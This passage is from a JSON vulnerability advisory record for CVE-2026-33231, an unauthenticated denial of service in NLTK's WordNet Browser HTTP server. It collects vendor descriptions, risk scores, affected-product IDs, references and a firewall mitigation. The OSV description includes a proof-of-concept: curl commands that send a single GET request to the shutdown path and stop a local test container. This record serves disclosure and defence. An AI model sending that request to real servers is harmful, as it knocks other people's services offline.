`os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33231" }, { "category": "description", "text": "A flaw was found in NLTK (Natural Language Toolkit), specifically in the `nltk.app.wordnet_app` component. An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted GET request to the local WordNet Browser HTTP server when it is running in its default configuration. This action causes the server process to terminate immediately, leading to a denial of service.\nIMPORTANT: This flaw allows an unauthenticated remote attacker to cause a denial of service in Red Hat products utilizing the NLTK WordNet Browser HTTP server. The vulnerability is exploitable when the server is running in its default configuration, allowing a specially crafted GET request to terminate the process.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33231.json" }, { "category": "description", "text": "### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-jm6w-m3j8-898g.json?alt=media" }, { "category": "other", "text": "0.00041", "title": "EPSS" }, { "category": "other", "text": "4.7", "title": "NCSC Score" }, { "category": "other", "text": "There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to a product by vendor Ibm", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5878160", "CSAFPID-1409483", "CSAFPID-1409484", "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-4675946", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5826731", "CSAFPID-5834017", "CSAFPID-337467", "CSAFPID-477846", "CSAFPID-477847", "CSAFPID-477848", "CSAFPID-477849", "CSAFPID-477850", "CSAFPID-477851", "CSAFPID-477852", "CSAFPID-477853", "CSAFPID-477854", "CSAFPID-477855", "CSAFPID-477856", "CSAFPID-477857", "CSAFPID-477858", "CSAFPID-477859", "CSAFPID-477860", "CSAFPID-477861", "CSAFPID-477862", "CSAFPID-477863", "CSAFPID-477864", "CSAFPID-477865", "CSAFPID-477866", "CSAFPID-710859", "CSAFPID-710860", "CSAFPID-710861", "CSAFPID-710862", "CSAFPID-710863", "CSAFPID-710864", "CSAFPID-712017", "CSAFPID-712018", "CSAFPID-3249744", "CSAFPID-3249745", "CSAFPID-3249746", "CSAFPID-3249747", "CSAFPID-3249748", "CSAFPID-3249749", "CSAFPID-3249750", "CSAFPID-3249751", "CSAFPID-3249752", "CSAFPID-3249753", "CSAFPID-3249754", "CSAFPID-3249755", "CSAFPID-3249756", "CSAFPID-3249757", "CSAFPID-3249758", "CSAFPID-3249759", "CSAFPID-3249760", "CSAFPID-3249761", "CSAFPID-3249762", "CSAFPID-3249763", "CSAFPID-3249764", "CSAFPID-3249765", "CSAFPID-3249766", "CSAFPID-3249767", "CSAFPID-3249768", "CSAFPID-3249769", "CSAFPID-3249770", "CSAFPID-3249771", "CSAFPID-3249772", "CSAFPID-3249773", "CSAFPID-5667818", "CSAFPID-5667819", "CSAFPID-5667820", "CSAFPID-5912812", "CSAFPID-5912814", "CSAFPID-1189281" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-jm6w-m3j8-898g" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33231" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33231.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-33231" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33231.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-jm6w-m3j8-898g.json?alt=media" }, { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-jm6w-m3j8-898g" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/nltk/nltk/commit/bbaae83db86a0f49e00f5b0db44a7254c268de9b" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33231" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33231" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0895" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267668" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267691" } ], "remediations": [ { "category": "mitigation", "details": "To mitigate this vulnerability, ensure that the NLTK WordNet Browser HTTP server (`nltk.app.wordnet_app`) is not exposed to untrusted networks. If the WordNet Browser functionality is not required, disable or remove the component. For deployments where the server is necessary, configure firewall rules to restrict access to trusted hosts only. A service restart may be required for changes to take effect.", "product_ids": [ "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-4675946", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5826731", "CSAFPID-5834017" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1189281", "CSAFPID-1409483", "CSAFPID-1409484", "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-3249744", "CSAFPID-3249745", "CSAFPID-3249746", "CSAFPID-3249747", "CSAFPID-3249748", "CSAFPID-3249749", "CSAFPID-3249750", "CSAFPID-3249751", "CSAFPID-3249752", "CSAFPID-3249753", "CSAFPID-3249754", "CSAFPID-3249755", "CSAFPID-3249756", "CSAFPID-3249757", "CSAFPID-3249758", "CSAFPID-3249759", "CSAFPID-3249760", "CSAFPID-3249761", "CSAFPID-3249762", "CSAFPID-3249763", "CSAFPID-3249764", "CSAFPID-3249765", "CSAFPID-3249766", "CSAFPID-3249767", "CSAFPID-3249768", "CSAFPID-3249769", "CSAFPID-3249770", "CSAFPID-3249771", "CSAFPID-3249772", "CSAFPID-3249773", "CSAFPID-337467", "CSAFPID-4675946", "CSAFPID-477846", "CSAFPID-477847", "CSAFPID-477848", "CSAFPID-477849", "CSAFPID-477850", "CSAFPID-477851", "CSAFPID-477852", "CSAFPID-477853", "CSAFPID-477854", "CSAFPID-477855", "CSAFPID-477856", "CSAFPID-477857", "CSAFPID-477858", "CSAFPID-477859", "CSAFPID-477860", "CSAFPID-477861", "CSAFPID-477862", "CSAFPID-477863", "CSAFPID-477864", "CSAFPID-477865", "CSAFPID-477866", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5667818", "CSAFPID-5667819", "CSAFPID-5667820", "CSAFPID-5826731", "CSAFPID-5834017", "CSAFPID-5878160", "CSAFPID-5912812", "CSAFPID-5912814", "CSAFPID-710859", "CSAFPID-710860", "CSAFPID-710861", "CSAFPID-710862", "CSAFPID-710863", "CSAFPID-710864", "CSAFPID-712017", "CSAFPID-712018" ] } ], "title": "CVE-2026-33231" } ] }